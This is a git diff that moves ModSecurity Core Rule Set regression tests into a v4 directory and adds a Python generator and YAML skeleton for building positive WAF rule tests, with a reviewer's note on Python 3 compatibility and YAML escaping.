rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py new file mode 100755 index 000000000..b0dc08db3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py 
@@ -0,0 +1,104 @@
+#!/usr/bin/env python
+#@spartantri 2018
+
+import sys
+import argparse
+import base64
+
+parser = argparse.ArgumentParser()
+
+UserAgent="ModSecurity CRS 3 Tests"
+Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+AcceptEncoding="gzip,deflate"
+AcceptLanguage="en-us,en;q=0.5"
+ContentType="application/x-www-form-urlencoded"
+payloads=[]
+skeletontest=0
+Meta='''---
+ meta:
+ author: "spartantri"
+ enabled: true
+ name: "skeletonid.yaml"
+ description: "Positive tests for rule skeletonid"
+ tests:
+'''
+
+parser.add_argument('-a', action='store', dest='Addr', help='Target ip address',
+ default='127.0.0.1')
+parser.add_argument('-p', action='store', dest='Port', help='Target port',
+ default='80')
+parser.add_argument('-v', action='store', dest='Host', help='Target virtual host',
+ default='localhost')
+parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file',
+ default='positivetest.yaml.skeleton')
+parser.add_argument('-o', action='store', dest='output', help='output file',
+ default='')
+parser.add_argument('-r', action='store', dest='ruleid', help='Rule id',
+ default='944310')
+parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads',
+ default='')
+parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload',
+ default=[])
+parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads',
+ default='')
+parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads',
+ default='')
+parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64',
+ default=False)
+parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided',
+ default=False)
+parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output',
+ default=False)
+parser.add_argument('-w', action='store', dest='author', help='Test author',
+ default='spartantri')
+start_options = parser.parse_args()
+
+if len(sys.argv)<2 and not start_options.demo:
+ parser.print_usage()
+ exit()
+
+for p in start_options.combined_payload.split('|'):
+ if p not in payloads:
+ # print('Checking %s' % (p))
+ if len(p)>0:
+ payloads.append(''.join([start_options.prefix, p, start_options.sufix]))
+
+for p in start_options.list_payload:
+ payloads.append(''.join([start_options.prefix, p, start_options.sufix]))
+
+if start_options.output=='':
+ o=sys.stdout
+else:
+ o=open(start_options.output, 'w')
+
+o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author))
+for item in payloads:
+ if start_options.base64encode:
+ payload=base64.encodestring(item).replace('\n', '')
+ #print payload
+ else:
+ payload=item
+ with open(start_options.skeleton,'r') as f:
+ for l in f:
+ l=l.replace('skeletonid', start_options.ruleid)
+ l=l.replace('skeletonkeyword', payload)
+ l=l.replace('skeletondefaultaddr', start_options.Addr)
+ l=l.replace('skeletondefaultport', start_options.Port)
+ l=l.replace('skeletondefaulthost', start_options.Host)
+ l=l.replace('skeletondefaultuseragent', UserAgent)
+ l=l.replace('skeletondefaultacceptcharset', AcceptCharset)
+ l=l.replace('skeletondefaultacceptencoding', AcceptEncoding)
+ l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage)
+ l=l.replace('skeletondefaultcontenttype', ContentType)
+ l=l.replace('skeletondefaultaccept', Accept)
+ if 'skeletontest' in l:
+ l=l.replace('skeletontest', str(skeletontest))
+ skeletontest+=1
+ o.write(l)
+
+if start_options.output != '':
+ print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output))
+ o.close()
+
+#print('\nGenerated %s tests' % (str(skeletontest)))
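Review bot: The `-b` branch calls `base64.encodestring(item).replace('\n', '')`, which only works on Python 2: the function was removed in Python 3.9, and on earlier 3.x releases it rejects a str argument. Where the `#!/usr/bin/env python` shebang resolves to Python 3, `payload=base64.b64encode(item.encode('utf-8')).decode('ascii')` gives the same single-line result and needs no newline stripping. Separately, `l=l.replace('skeletonkeyword', payload)` writes the payload into the skeleton's double-quoted YAML scalars unescaped, so a payload containing `"` or `\` produces a file that fails to parse or tests a different string than intended; escaping those two characters before the substitution would keep the generated tests faithful. A comment under the shebang stating the supported Python version would also help.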
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton
new file mode 100644
index 000000000..65ca49569
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/positivetest-light.yaml.skeleton
@@ -0,0 +1,255 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword 
skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + 